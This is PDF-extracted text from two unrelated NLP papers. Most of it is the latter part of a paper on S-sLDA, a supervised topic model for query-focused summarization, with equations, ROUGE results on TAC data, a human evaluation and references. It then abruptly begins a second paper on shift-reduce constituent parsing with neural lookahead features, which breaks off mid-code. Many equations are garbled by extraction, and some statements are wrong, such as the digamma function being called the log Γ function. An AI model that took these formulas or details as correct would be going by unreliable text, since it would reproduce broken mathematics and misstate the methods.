y|−→zm,η,δ2 ∼ p(y|−→zm,η,δ2), where−→zm = 1N ∑N n=1 zm,n. 3.2 Problem Formulation Here we firstly give a standard formulation of the task. Let K be the number of topics, V be the vo- cabulary size and M be the number of documents. Each document Dm is represented with a collection of sentence Dm = {Ss}s=Nms=1 where Nm denotes the number of sentences in mth document. Each sentence is represented with a collection of words {wmsn}n=Nmsn=1 where Nms denotes the number of words in current sentence. −−→ Yms denotes the feature vector of current sentence and we assume that these features are independent. 3.3 S-sLDA zms is the hidden variable indicating the topic of current sentence. In S-sLDA, we make an assump- tion that words in the same sentence are generated from the same topic which was proposed by Gruber (2007). zmsn denotes the topic assignment of cur- rent word. According to our assumption, zmsn = Figure 3: Graph model for S-sLDA model 1. Draw a document proportion vector θm|α ∼ Dir(α) 2. For each sentence in m (a)draw topic assignment zms|θ ∼ Multi(θzmn ) (b)draw feature vector −−→ Yms|zms,η ∼ p( −−→ Yms|zms,η) (c)for each word wmsn in current sentence draw wmsn|zms,β ∼ Multi(βzms ) Figure 4: generation process for S-sLDA zms for any n ∈ [1,Nms]. The generative approach of S-sLDA is shown in Figure 3 and Figure 4. We can see that the generative process involves not only the words within current sentence, but also a series of sentence features. The mixture weights over fea- tures in S-sLDA are defined with a generalized lin- ear model (GLM). p( −−→ Yms|zms,η) = exp(zTmsη) −−→ Yms ∑ zms exp(zTmsη) −−→ Yms (1) Here we assume that each sentence has T features and −−→ Yms is a T × 1 dimensional vector. η is a K × T weight matrix of each feature upon topics, which largely controls the feature generation proce- dure. Unlike s-LDA where η is a latent variable esti- mated from the maximum likelihood estimation al- gorithm, in S-sLDA the value of η is trained through a supervised algorithm which will be illustrated in detail in Section 3. 
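Since z_ms is a one-hot topic indicator, Eqn. (1) is simply a softmax over the K topics of the linear scores eta_k . Y_ms. The following NumPy sketch evaluates it; the toy values of eta and Y are ours and only illustrate the shapes involved.

```python
import numpy as np

def feature_likelihood(eta: np.ndarray, y: np.ndarray) -> np.ndarray:
    """Evaluate Eqn. (1): p(Y_ms | z_ms = k, eta) for every topic k, where
    eta is the K x T feature-weight matrix and y is the T-dimensional
    feature vector of one sentence."""
    scores = eta @ y                 # eta_k . Y_ms for each topic k
    scores -= scores.max()           # subtract the max for numerical stability
    expd = np.exp(scores)
    return expd / expd.sum()         # normalize over the K topic assignments

# Toy example with K = 3 topics and T = 2 sentence features.
eta = np.array([[0.5, 1.0],
                [0.0, 0.2],
                [-0.3, 0.1]])
y = np.array([1.0, 0.4])
print(feature_likelihood(eta, y))    # a probability distribution over the 3 topics
```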
3.4 Posterior Inference and Estimation Given a document and labels for each sentence, the posterior distribution of the latent variables is: p(θ,z1:N|w1:N,Y,α,β1:K,η) = ∏ m p(θm|α) ∏ s[p(zms|θm)p( −−→ Yms|zms,η) ∏ n p(wmsn|zmsn,βzmsn ]∫ dθp(θm|α) ∑ z ∏ s[p(zms|θm)p( −−→ Yms|zms,η) ∏ n p(wmsn|βzmsn )] (2) Eqn. (2) cannot be efficiently computed. By applying the Jensens inequality, we obtain a lower bound of the log likelihood of document p(θ,z1:N|w1:N, −−→ Yms,α,β1:K,η) ≥ L, where L = ∑ ms E[logP(zms|θ)] + ∑ ms E[logP( −−→ Yms|zms,η)]+ ∑ m E[logP (θ|α)] + ∑ msn E[logP(wmsn|zms,β)] + H(q) (3) 91 where H(q) = −E[logq] and it is the entropy of variational distribution q is defined as q(θ,z|γ,φ) = ∏ mk q(θm|γ) ∏ sn q(zmsn|φms) (4) here γ a K-dimensional Dirichlet parameter vector and multinomial parameters. The first, third and forth terms of Eqn. (3) are identical to the corre- sponding terms for unsupervised LDA (Blei et al., 2003). The second term is the expectation of log probability of features given the latent topic assign- ments. E[logP( −−→ Yms|zms,η)] = E(zms) Tη −−→ Yms − log ∑ zms exp(zTmsη −−→ Yms) (5) where E(zms)T is a 1 × K dimensional vector [φmsk] k=K k=1 . The Bayes estimation for S-sLDA model can be got via a variational EM algorithm. In EM procedure, the lower bound is firstly minimized with respect to γ and φ, and then minimized with α and β by fixing γ and φ. E-step: The updating of Dirichlet parameter γ is identical to that of unsupervised LDA, and does not involve feature vector −−→ Yms. γnewm ← α + ∑ s∈m φs (6) φnewsk ∝ exp{E[logθm|γ] + Nms∑ n=1 E[log(wmsn|β1:K)]+ T∑ t=1 ηktYst} = exp[Ψ(γmk) − Ψ( K∑ k=1 γmk) + T∑ t=1 ηktYst] (7) where Ψ(·) denotes the log Γ function. ms denotes the document that current sentence comes from and Yst denotes the tth feature of sentence s. M-step: The M-step for updating β is the same as the pro- cedure in unsupervised LDA, where the probability of a word generated from a topic is proportional to the number of times this word assigned to the topic. βnewkw = M∑ m=1 Nm∑ s=1 Nms∑ n=1 1(wmsn = w)φ k ms (8) 4 Our Approach 4.1 Learning In this subsection, we describe how we learn the fea- ture weight η in a supervised way. The learning pro- cess of η is a supervised algorithm combined with variational inference of S-sLDA. Given a topic de- scription Q1 and a collection of training sentences S from related documents, human assessors assign a score v(v = −2,−1, 0, 1, 1) to each sentence in S. The score is an integer between −2 (the least desired summary sentences) and +2 (the most desired sum- mary sentences), and score 0 denotes neutral atti- tude. Ov = {ov1,ov2, ...,vvk}(v = −2,−1, 0, 1, 2) is the set containing sentences with score v. Let φQk denote the probability that query is generated from topic k. Since query does not belong to any docu- ment, we use the following strategy to leverage φQk φQk = ∏ w∈Q βkw· 1 M M∑ m=1 exp[Ψ(γmk)−Ψ( K∑ k=1 γmk)] (9) In Equ.(9), ∏ w∈Q βkw denotes the probability that all terms in query are generated from topic k and 1 M ∑M m=1 exp[Ψ(γmk)−Ψ( ∑K k=1 γmk)] can be seen as the average probability that all documents in the corpus are talking about topic k. Eqn. (9) is based on the assumption that query topic is relevant to the main topic discussed by the document corpus. This is a reasonable assumption and most previous LDA summarization models are based on similar as- sumptions. 
Next, we define φOv,k for sentence set Ov, which can be interpreted as the probability that all sen- tences in collection Ov are generated from topic k. φOv,k = 1 |Ov| ∑ s∈Ov φsk,k ∈ [1,K],v ∈ [−2, 2] (10) |Ov| denotes the number of sentences in set Ov. In- spired by the idea that desired summary sentences would be more semantically related with the query, we transform problem of finding optimum η to the following optimization problem: minηL(η) = v=2∑ v=−2 v ·KL(Ov||Q); T∑ t=1 ηkt = 1 (11) 1We select multiple queries and their related sentences for training 92 where KL(Ov||Q) is the Kullback-Leibler diver- gence between the topic and sentence set Ov as shown in Eqn.(12). KL(Ov||Q) = K∑ k=1 φOvklog φOvk φQk (12) In Eqn. (11), we can see that O2, which contain de- sirable sentences, would be given the largest penalty for its KL divergence from Query. The case is just opposite for undesired set. Our idea is to incorporate the minimization pro- cess of Eqn.(11) into variational inference process of S-sLDA model. Here we perform gradient based optimization method to minimize Eqn.(11). Firstly, we derive the gradient of L(η) with respect to η. ∂L(η) ηxy = v=2∑ v=−2 v · ∂KL(Qv||Q) ∂ηxy (13) ∂KL(Qv||Q) ∂ηxy = K∑ k=1 1 |Qv| (1 + log ∑ s∈Qv |Qv| ) ∑ s∈Qv ∂φsk ∂ηxy − K∑ k=1 1 |Qv| ∑ s∈Qv ∂Qsk ηxy − K∑ k=1 1 Qv ∑ s∈Qvφsk φQk ∂φsk ∂ηxy (14) For simplification, we regard β and γ as constant during updating process of η, so ∂φQk ∂ηxy = 0.2 We can further get first derivative for each labeled sentence. ∂φsk ηxy ∝    Ysyexp[Ψ(γmsi) − Ψ( K∑ k=1 γmsk) + T∑ t=1 ηktYsy] × ∏ w∈s βkw if k = x 0 if k 6= x (15) 4.2 Feature Space Lots of features have been proven to be useful for summarization (Louis et al., 2010). Here we dis- cuss several types of features which are adopted in S-sLDA model. The feature values are either binary or normalized to the interval [0,1]. The following features are used in S-sLDA: Cosine Similarity with query: Cosine similarity is based on the tf-idf value of terms. 2This is reasonable because the influence of γ and β have been embodied in φ during each iteration. Local Inner-document Degree Order: Local Inner document Degree Order is a binary feature which indicates whether Inner-document Degree (IDD) of sentence s is the largest among its neighbors. IDD means the edge number between s and other sen- tences in the same document. Document Specific Word: 1 if a sentence contains document specific word, 0 otherwise. Average Unigram Probability (Nenkova and Van- derwende, 2005; Celikyilmaz and Hakkani-Tur 2010): As for sentence s, p(s) = ∑ w∈s 1 |s|pD(w), where pD(w) is the observed unigram probability in document collection. In addition, we also use the commonly used fea- tures including sentence position, paragraph po- sition, sentence length and sentence bigram fre- quency. E-step initialize φ0sk := 1/K for all i and s. initialize γmi := αmi + N)m/K for all i. initialize ηkt = 0 for all k and t. while not convergence for m = 1 : M update γt+1m according to Eqn.(6) for s = 1 : Nm for k = 1 : K update φt+1sk according to Eqn.(7) normalize the sum of φt+1sk to 1. Minimize L(η) according to Eqn.(11)-(15). M-step: update β according to Eqn.(8) Figure 5: Learning process of η in S-sLDA 4.3 Sentence Selection Strategy Next we explain our sentence selection strategy. Ac- cording to our intuition that the desired summary should have a small KL divergence with query, we propose a function to score a set of sentences Sum. 
We use a decreasing logistic function ζ(x) = 1/(1+ ex) to refine the score to the range of (0,1). Score(Sum) = ζ(KL(sum||Q)) (16) Let Sum? denote the optimum update summary. We can get Sum? by maximizing the scoring function. Sum? = arg max Sum∈S&&words(Sum)≤L Score(Sum) (17) 93 1. Learning: Given labeled set Ov, learn the feature weight vector η using algorithm in Figure 5. 2. Given new data set and η, use algorithm in section 3.3 for inference. (The only difference between this step and step (1) is that in this step we do not need minimize L(η). 3. Select sentences for summarization from algo- rithm in Figure 6. Figure 6: Summarization Generation by S-sLDA. A greedy algorithm is applied by adding sentence one by one to obtain Sum?. We use G to denote the sentence set containing selected sentences. The algorithm first initializes G to Φ and X to SU. Dur- ing each iteration, we select one sentence from X which maximize Score(sm ∪G). To avoid topic re- dundancy in the summary, we also revise the MMR strategy (Goldstein et al., 1999; Ouyang et al., 2007) in the process of sentence selection. For each sm, we compute the semantic similarity between sm and each sentence st in set Y in Eqn.(18). cos−sem(sm,st) = ∑ k φsmkφstk√∑ k φ 2 smk √∑ k φ 2 stk (18) We need to assure that the value of semantic similar- ity between two sentences is less than Thsem. The whole procedure for summarization using S-sLDA model is illustrated in Figure 6. Thsem is set to 0.5 in the experiments. 5 Experiments 5.1 Experiments Set-up The query-focused multi-document summarization task defined in DUC3(Document Understanding Conference) and TAC4(Text Analysis Conference) evaluations requires generating a concise and well organized summary for a collection of related news documents according to a given query which de- scribes the users information need. The query usually consists of a title and one or more narra- tive/question sentences. The system-generated sum- maries for DUC and TAC are respectively limited to 3http://duc.nist.gov/. 4http://www.nist.gov/tac/. 250 words and 100 words. Our experiment data is composed of DUC 2007, TAC5 2008 and TAC 2009 data which have 45, 48 and 44 collections respec- tively. In our experiments, DUC 2007 data is used as training data and TAC (2008-2009) data is used as the test data. Stop-words in both documents and queries are removed using a stop-word list of 598 words, and the remaining words are stemmed by Porter Stem- mer6. As for the automatic evaluation of summa- rization, ROUGE (Recall-Oriented Understudy for Gisting Evaluation) measures, including ROUGE- 1, ROUGE-2, and ROUGE-SU47 and their corre- sponding 95% confidence intervals, are used to eval- uate the performance of the summaries. In order to obtain a more comprehensive measure of summary quality, we also conduct manual evaluation on TAC data with reference to (Haghighi and Vanderwende, 2009; Celikyilmaz and Hakkani-Tur, 2011; Delort and Alfonseca, 2011). 5.2 Comparison with other Bayesian models In this subsection, we compare our model with the following Bayesian baselines: KL-sum: It is developed by Haghighi and Vanderwende (Lin et al., 2006) by using a KL- divergence based sentence selection strategy. KL(Ps||Qd) = ∑ w P(w)log P(w) Q(w) (19) where Ps is the unigram distribution of candidate summary and Qd denotes the unigram distribution of document collection. Sentences with higher ranking score is selected into the summary. 
HierSum: A LDA based approach proposed by Haghighi and Vanderwende (2009), where unigram distribution is calculated from LDA topic model in Equ.(14). Hybhsum: A supervised approach developed by Celikyilmaz and Hakkani-Tur (2010). For fair comparison, baselines use the same pro- precessing methods with our model and all sum- 5Here, we only use the docset-A data in TAC, since TAC data is composed of docset-A and docset-B data, and the docset- B data is mainly for the update summarization task. 6http://tartarus.org/ martin/PorterStemmer/. 7Jackknife scoring for ROUGE is used in order to compare with the human summaries. 94 maries are truncated to the same length of 100 words. From Table 1 and Table 2, we can Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3724 0.1030 0.1342 approach (0.3660-0.3788) (0.0999-0.1061) (0.1290-0.1394) Hybhsum 0.3703 0.1007 0.1314 (0.3600-0.3806) (0.0952-0.1059) (0.1241-0.1387) HierSum 0.3613 0.0948 0.1278 (0.3374-0.3752) (0.0899-0.0998) (0.1197-0.1359) KLsum 0.3504 0.0917 0.1234 (0.3411-0.3597) (0.0842-0.0992) (0.1155-0.1315) StandLDA 0.3368 0.0797 0.1156 (0.3252-0.3386) (0.0758-0.0836) (0.1072-0.1240) Table 1: Comparison of Bayesian models on TAC2008 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3903 0.1223 0.1488 approach (0.3819-0.3987) (0.1167-0.1279) (0.1446-0.1530) Hybhsum 0.3824 0.1173 0.1436 (0.3686-0.3952) (0.1132-0.1214) (0.1358-0.1514) HierSum 0.3706 0.1088 0.1386 (0.3624-0.3788) (0.0950-0.1144) (0.1312-0.1464) KLsum 0.3619 0.0972 0.1299 (0.3510-0.3728) (0.0917-0.1047) (0.1213-0.1385) StandLDA 0.3552 0.0847 0.1214 (0.3447-0.3657) (0.0813-0.0881) (0.1141-0.1286) Table 2: Comparison of Bayesian models on TAC2009 see that among all the Bayesian baselines, Hybh- sum achieves the best result. This further illus- trates the advantages of combining topic model with supervised method. In Table 1, we can see that our S-sLDA model performs better than Hybhsum and the improvements are 3.4% and 3.7% with re- spect to ROUGE-2 and ROUGE-SU4 on TAC2008 data. The comparison can be extended to TAC2009 data as shown in Table 2: the performance of S- sLDA is above Hybhsum by 4.3% in ROUGE-2 and 5.1% in ROUGE-SU4. It is worth explaining that these achievements are significant, because in the TAC2008 evaluation, the performance of the top ranking systems are very close, i.e. the best system is only 4.2% above the 4th best system on ROUGE- 2 and 1.2% on ROUGE-SU4. 5.3 Comparison with other baselines. In this subsection, we compare our model with some widely used models in summarization. Manifold: It is the one-layer graph based semi- supervised summarization approach developed by Wan et al.(2008). The graph is constructed only con- sidering sentence relations using tf-idf and neglects topic information. LexRank: Graph based summarization approach (Erkan and Radev, 2004), which is a revised version of famous web ranking algorithm PageRank. It is an unsupervised ranking algorithms compared with Manifold. SVM: A supervised method - Support Vector Ma- chine (SVM) (Vapnik 1995) which uses the same features as our approach. MEAD: A centroid based summary algorithm by Radev et al. (2004). Cluster centroids in MEAD consists of words which are central not only to one article in a cluster, but to all the articles. Similarity is measure using tf-idf. 
At the same time, we also present the top three participating systems with regard to ROUGE-2 on TAC2008 and TAC2009 for comparison, denoted as (denoted as SysRank 1st, 2nd and 3rd)(Gillick et al., 2008; Zhang et al., 2008; Gillick et al., 2009; Varma et al., 2009). The ROUGE scores of the top TAC system are directly provided by the TAC evaluation. From Table 3 and Table 4, we can see that our approach outperforms the baselines in terms of ROUGE metrics consistently. When compared with the standard supervised method SVM, the relative improvements over the ROUGE-1, ROUGE-2 and ROUGE-SU4 scores are 4.3%, 13.1%, 8.3% respec- tively on TAC2008 and 7.2%, 14.9%, 14.3% on TAC2009. Our model is not as good as top par- ticipating systems on TAC2008 and TAC2009. But considering the fact that our model neither uses sen- tence compression algorithm nor leverage domain knowledge bases like Wikipedia or training data, such small difference in ROUGE scores is reason- able. 5.4 Manual Evaluations In order to obtain a more accurate measure of sum- mary quality for our S-sLDA model and Hybhsum, we performed a simple user study concerning the following aspects: (1) Overall quality: Which sum- mary is better overall? (2) Focus: Which summary contains less irrelevant content? (3)Responsiveness: Which summary is more responsive to the query. (4) Non-Redundancy: Which summary is less re- dundant? 8 judges who specialize in NLP partic- ipated in the blind evaluation task. Evaluators are presented with two summaries generated by S-sLDA 95 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3724 0.1030 0.1342 approach (0.3660-0.3788) (0.0999-0.1061) (0.1290-0.1394) SysRank 1st 0.3742 0.1039 0.1364 (0.3639-0.3845) (0.0974-0.1104) (0.1285-0.1443) SysRank 2nd 0.3717 0.0990 0.1326 (0.3610-0.3824 (0.0944-0.1038) (0.1269-0.1385) SysRank 3rd 0.3710 0.0977 0.1329 (0.3550-0.3849) (0.0920-0.1034) (0.1267-0.1391) PageRank 0.3597 0.0879 0.1221 (0.3499-0.3695) (0.0809-0.0950) (0.1173-0.1269) Manifold 0.3621 0.0931 0.1243 (0.3506-0.3736) (0.0868-0.0994) (0.1206-0.1280) SVM 0.3588 0.0921 0.1258 (0.3489-0.3687) (0.0882-0.0960) (0.1204-0.1302) MEAD 0.3558 0.0917 0.1226 (0.3489-0.3627) (0.0882-0.0952) (0.1174-0.1278) Table 3: Comparison with baselines on TAC2008 Methods ROUGE-1 ROUGE-2 ROUGE-SU4 Our 0.3903 0.1223 0.1488 approach (0.3819-0.3987) (0.1167-0.1279) (0.1446-0.1530) SysRank 1st 0.3917 0.1218 0.1505 (0.3778-0.4057) (0.1122-0.1314) (0.1414-0.1596) SysRank 2nd 0.3914 0.1212 0.1513 (0.3808-0.4020) (0.1147-0.1277) (0.1455-0.1571) SysRank 3rd 0.3851 0.1084 0.1447 (0.3762-0.3932) (0.1025-0.1144) (0.1398-0.1496) PageRank 0.3616 0.0849 0.1249 (0.3532-0.3700) (0.0802-0.0896) (0.1221-0.1277) Manifold 0.3713 0.1014 0.1342 (0.3586-0.3841) (0.0950-0.1178) (0.1299-0.1385) SVM 0.3649 0.1028 0.1319 (0.3536-0.3762) (0.0957-0.1099) (0.1258-0.1380) MEAD 0.3601 0.1001 0.1287 (0.3536-0.3666) (0.0953-0.1049) (0.1228-0.1346) Table 4: Comparison with baselines on TAC2009 and Hybhsum, as well as the four questions above. Then they need to answer which summary is better (tie). We randomly select 20 document collections from TAC 2008 data and randomly assign two sum- maries for each collection to three different evalua- tors to judge which model is better in each aspect. As we can see from Table 5, the two models al- most tie with respect to Non-redundancy, mainly because both models have used appropriate MMR strategies. 
But as for Overall quality, Focus and Responsiveness, the S-sLDA model outperforms Hybhsum, based on a t-test at the 95% confidence level.
Table 5: Results of the manual evaluation (number of wins over the 60 pairwise judgments).
Overall quality: Our approach 37, Hybhsum 14, Tie 9
Focus: Our approach 32, Hybhsum 18, Tie 10
Responsiveness: Our approach 33, Hybhsum 13, Tie 14
Non-redundancy: Our approach 13, Hybhsum 11, Tie 36
Table 6 shows the example summaries generated respectively by the two models for document collection D0803A-A in TAC2008, whose query is "Describe the coal mine accidents in China and actions taken". From Table 6, we can see that each sentence in these two summaries is somewhat related to topics of coal mines in China. We also observe that the summary in Table 6(a) is better than that in Table 6(b), tending to select shorter sentences and provide more information. This is because, in the S-sLDA model, topic modeling is determined simultaneously by various features including terms and other ones such as sentence length, sentence position and so on, which can contribute to summary quality. As we can see, in Table 6(b), sentences (3) and (5) provide some unimportant information such as "somebody said", though they contain some words which are related to topics about coal mines.
Table 6: Example summary text generated by systems (a) S-sLDA and (b) Hybhsum (D0803A-A, TAC2008).
(a) (1) China to close at least 4,000 coal mines this year: official. (2) By Oct. 10 this year there had been 43 coal mine accidents that killed 10 or more people. (3) Officials had stakes in coal mines. (4) All the coal mines will be closed down this year. (5) In the first eight months, the death toll of coal mine accidents rose 8.5 percent last year. (6) The government has issued a series of regulations and measures to improve the country's coal mine safety situation. (7) The mining safety technology and equipments have been sold to countries. (8) More than 6,000 miners died in accidents in China.
(b) (1) In the first eight months, the death toll of coal mine accidents across China rose 8.5 percent from the same period last year. (2) China will close down a number of ill-operated coal mines at the end of this month, said a work safety official here Monday. (3) Li Yizhong, director of the National Bureau of Production Safety Supervision and Administration, has said the collusion between mine owners and officials is to be condemned. (4) From January to September this year, 4,228 people were killed in 2,337 coal mine accidents. (5) Chen said officials who refused to register their stakes in coal mines within the required time
6 Conclusion
In this paper, we propose a novel supervised approach based on a revised supervised topic model for query-focused multi-document summarization. Our approach naturally combines a Bayesian topic model with a supervised method and enjoys the advantages of both models. Experiments on benchmark data demonstrate the good performance of our model.
Acknowledgments
This research work has been supported by NSFC grants (No.90920011 and No.61273278), the National Key Technology R&D Program (No.2011BAH1B0403), and the National High Technology R&D Program (No.2012AA011101). We also thank the three anonymous reviewers for their helpful comments. Corresponding author: Sujian Li.
References
David Blei and Jon McAuliffe. 2007. Supervised topic models. In Neural Information Processing Systems.
David Blei, Andrew Ng and Michael Jordan. 2003. Latent dirichlet allocation. The Journal of Machine Learning Research, pages 993-1022.
Charles Broyden. 1965. A class of methods for solving nonlinear simultaneous equations. Math. Comp., volume 19, pages 577-593.
Jaime Carbonell and Jade Goldstein. 1998. The use of MMR, diversity-based reranking for reordering doc- uments and producing summaries. In Proceedings of the 21st annual international ACM SIGIR conference on Research and development in information retrieval. Asli Celikyilmaz and Dilek Hakkani-Tur. 2010. A Hy- brid hierarchical model for multi-document summa- rization. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics. page: 815-825 Jade Goldstein, Mark Kantrowitz, Vibhu Mittal and Jaime Carbonell. 1999. Summarizing Text Docu- ments: Sentence Selection and Evaluation Metrics. In Proceedings of the 22nd annual international ACM SI- GIR conference on Research and development in infor- mation retrieval, page: 121-128. Amit Grubber, Micheal Rosen-zvi and Yair Weiss. 2007. Hidden Topic Markov Model. In Artificial Intelligence and Statistics. Hal Daume and Daniel Marcu H. 2006. Bayesian Query- Focused Summarization. In Proceedings of the 21st International Conference on Computational Linguis- tics and the 44th annual meeting of the Association for Computational Linguistics, page 305-312. Gune Erkan and Dragomir Radev. 2004. Lexrank: graph- based lexical centrality as salience in text summariza- tion. In J. Artif. Intell. Res. (JAIR), page 457-479. Dan Gillick, Benoit Favre, Dilek Hakkani-Tur, The ICSI Summarization System at TAC, TAC 2008. Dan Gillick, Benoit Favre, and Dilek Hakkani-Tur, Berndt Bohnet, Yang Liu, Shasha Xie. The ICSI/UTD Summarization System at TAC 2009. TAC 2009 Aria Haghighi and Lucy Vanderwende. 2009. Exploring content models for multi-document summarization. In Proceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chap- ter of the Association for Computational Linguistics, pages 362370. Feng Jin, Minlie Huang, and Xiaoyan Zhu. 2010. The summarization systems at tac 2010. In Proceedings of the third Text Analysis Conference, TAC-2010. Liangda Li, Ke Zhou, Gui-Rong Xue, Hongyuan Zha and Yong Yu. 2009. Enhancing diversity, coverage and bal- ance for summarization through structure learning. In Proceedings of the 18th international conference on World wide web, page 71-80. Chin-Yew Lin, Guihong Gao, Jianfeng Gao and Jian-Yun Nie. 2006. An information-theoretic approach to au- tomatic evaluation of summaries. In Proceedings of the main conference on Human Language Technology Conference of the North American Chapter of the As- sociation of Computational Linguistics, page:462-470. Annie Louis, Aravind Joshi, Ani Nenkova. 2010. Dis- course indicators for content selection in summariza- tion. In Proceedings of the 11th Annual Meeting of the Special Interest Group on Discourse and Dialogue, page:147-156. Tengfei Ma, Xiaojun Wan. 2010. Multi-document sum- marization using minimum distortion, in Proceedings of International Conference of Data Mining. page 354363. Rebecca Mason and Eugene Charniak. 2011. Extractive multi-document summaries should explicitly not con- tain document-specific content. In proceedings of ACL HLT, page:49-54. Ani Nenkova and Lucy Vanderwende. The impact of fre- quency on summarization. In Tech. Report MSR-TR- 2005-101, Microsoft Research, Redwood, Washing- ton, 2005. Ani Nenkova, Lucy Vanderwende and Kathleen McKe- own. 2006. A compositional context sensitive multi- document summarizer: exploring the factors that inu- ence summarization. In Proceedings of the 29th an- nual International ACM SIGIR Conference on Re- 97 search and Development in Information Retrieval, page 573-580. 
Miles Osborne. 2002. Using maximum entropy for sen- tence extraction. In Proceedings of the ACL-02 Work- shop on Automatic Summarization, Volume 4 page:1- 8. Jahna Otterbacher, Gunes Erkan and Dragomir Radev. 2005. Using random walks for question-focused sen- tence retrieval. In Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Processing, page 915-922 You Ouyang, Wenjie Li, Sujian Li and Qin Lua. 2011. Applying regression models to query-focused multi- document summarization. In Information Processing and Management, page 227-237. You Ouyang, Sujian. Li, and Wenjie. Li. 2007, Develop- ing learning strategies for topic-based summarization. In Proceedings of the sixteenth ACM conference on Conference on information and knowledge manage- ment, page: 7986. Daniel Ramage, David Hall, Ramesh Nallapati and Christopher Manning. 2009. Labeled LDA: A super- vised topic model for credit attribution in multi-labeled corpora. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, Vol 1, page 248-256. Dou She, Jian-Tao Sun, Hua Li, Qiang Yang and Zheng Chen. 2007. Document summarization using conditional random elds. In Proceedings of Inter- national Joint Conference on Artificial Intelligence, page: 28622867. V. Varma, V. Bharat, S. Kovelamudi, P. Bysani, S. GSK, K. Kumar N, K. Reddy, N. Maganti , IIIT Hyderabad at TAC 2009. TAC2009 Xiaojun Wan and Jianwu Yang. 2008. Multi-document Summarization using cluster-based link analysis. In Proceedings of the 31st annual international ACM SI- GIR conference on Research and development in in- formation retrieval, page: 299-306. Xiaojun Wan, Jianwu Yang and Jianguo Xiao. 2007. Manifold-ranking based topic-focused multi- document summarization. In Proceedings of In- ternational Joint Conference on Artificial Intelligence, page 2903-2908. Furu Wei, Wenjie Li, Qin Lu and Yanxiang He. 2008. Ex- ploiting Query-Sensitive Similarity for Graph-Based Query-Oriented Summarization. In Proceedings of the 31st annual International ACM SIGIR Conference on Research and Development in Information Retrieval, page 283-290. Jin Zhang, Xueqi Cheng, Hongbo Xu, Xiaolei Wang, Yil- ing Zeng. ICTCAS’s ICTGrasper at TAC 2008: Sum- marizing Dynamic Information with Signature Terms Based Content Filtering, TAC 2008. Dengzhong Zhou, Jason Weston, Arthur Gretton, Olivier Bousquet and Bernhard Schlkopf. 2003. Ranking on Data Manifolds. In Proceedings of the Conference on Advances in Neural Information Processing Systems, page 169-176. Jun Zhu and Eric Xing. 2010. Conditional Topic Random Fields. In Proceedings of the 27th International Con- ference on Machine Learning. Xiaojin Zhu, Zoubin Ghahramani and John Laf- ferty. 2003. Semi-supervised Learning using Gaussian Fields and Harmonic Functions. In Proceedings of In- ternational Conference of Machine Learning, page: 912-919. 98 work_235n7dcftbgpplqreihoa3x6uy ---- Shift-Reduce Constituent Parsing with Neural Lookahead Features Jiangming Liu and Yue Zhang Singapore University of Technology and Design, 8 Somapah Road, Singapore, 487372 {jiangming liu, yue zhang}@sutd.edu.sg Abstract Transition-based models can be fast and accu- rate for constituent parsing. Compared with chart-based models, they leverage richer fea- tures by extracting history information from a parser stack, which consists of a sequence of non-local constituents. 
On the other hand, during incremental parsing, constituent information on the right-hand side of the current word is not utilized, which is a relative weakness of shift-reduce parsing. To address this limitation, we leverage a fast neural model to extract lookahead features. In particular, we build a bidirectional LSTM model, which leverages full sentence information to predict the hierarchy of constituents that each word starts and ends. The results are then passed to a strong transition-based constituent parser as lookahead features. The resulting parser gives 1.3% absolute improvement on WSJ and 2.3% on CTB compared to the baseline, giving the highest reported accuracies for fully-supervised parsing.
1 Introduction
Transition-based constituent parsers are fast and accurate, performing incremental parsing using a sequence of state transitions in linear time. Pioneering models rely on a classifier to make local decisions, searching greedily for local transitions to build a parse tree (Sagae and Lavie, 2005). Zhu et al. (2013) use a beam search framework, which preserves the linear time complexity of greedy search, while alleviating the disadvantage of error propagation. The model gives state-of-the-art accuracies at a speed of 89 sentences per second on the standard WSJ benchmark (Marcus et al., 1993).
Zhu et al. (2013) exploit rich features by extracting history information from a parser stack, which consists of a sequence of non-local constituents. However, due to the incremental nature of shift-reduce parsing, the right-hand side constituents of the current word cannot be used to guide the action at each step. Such lookahead features (Tsuruoka et al., 2011) correspond to the outside scores in chart parsing (Goodman, 1998), which have been effective for obtaining improved accuracies.
To leverage such information for improving shift-reduce parsing, we propose a novel neural model to predict the constituent hierarchy related to each word before parsing. Our idea is inspired by the work of Roark and Hollingshead (2009) and Zhang et al. (2010b), which shows that shallow syntactic information gathered over the word sequence can be utilized for pruning chart parsers, improving chart parsing speed without sacrificing accuracy. For example, Roark and Hollingshead (2009) predict constituent boundary information on words as a preprocessing step, and use such information to prune the chart. Since such information is much lighter-weight compared to full parsing, it can be predicted relatively accurately using sequence labellers.
Different from Roark and Hollingshead (2009), we collect lookahead constituent information for shift-reduce parsing, rather than pruning information for chart parsing. Our main concern is improving the accuracy rather than improving the speed. Accordingly, our model should predict the constituent hierarchy for each word rather than simple boundary information. For example, in Figure 1(a), the constituent hierarchy that the word "The" starts is "S → NP", and the constituent hierarchy that the word "table" ends is "S → VP → NP → PP → NP".
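To make these per-word constituent hierarchies concrete, the following minimal Python sketch (illustrative only, not the parser's released code; the tuple encoding and function names are assumptions) reads the s-type and e-type hierarchies off a small bracketed tree.

```python
# Illustrative sketch: for every word, collect the hierarchy of constituents it
# starts (s-type) and ends (e-type), ordered top-down as in Figure 1.
# POS pre-terminals such as DT are skipped, matching the paper's examples.

def hierarchies(tree):
    s_type, e_type, words = {}, {}, []

    def walk(node):
        label, children = node[0], node[1:]
        if len(children) == 1 and isinstance(children[0], str):
            # pre-terminal (a POS tag over one word): record the word, skip the label
            idx = len(words)
            words.append(children[0])
            return idx, idx
        spans = [walk(child) for child in children]
        start, end = spans[0][0], spans[-1][1]
        # a constituent is started by its first word and ended by its last word
        s_type.setdefault(start, []).append(label)
        e_type.setdefault(end, []).append(label)
        return start, end

    walk(tree)
    # labels were collected bottom-up while unwinding the recursion; reverse them
    chain = lambda labels: " -> ".join(reversed(labels)) if labels else "Ø"
    return [(w, chain(s_type.get(i, [])), chain(e_type.get(i, [])))
            for i, w in enumerate(words)]

tree = ("S",
        ("NP", ("DT", "The"), ("NNS", "students")),
        ("VP", ("VB", "like"), ("NP", ("DT", "this"), ("NN", "book"))))
for word, s, e in hierarchies(tree):
    print(f"{word:10s} starts: {s:12s} ends: {e}")
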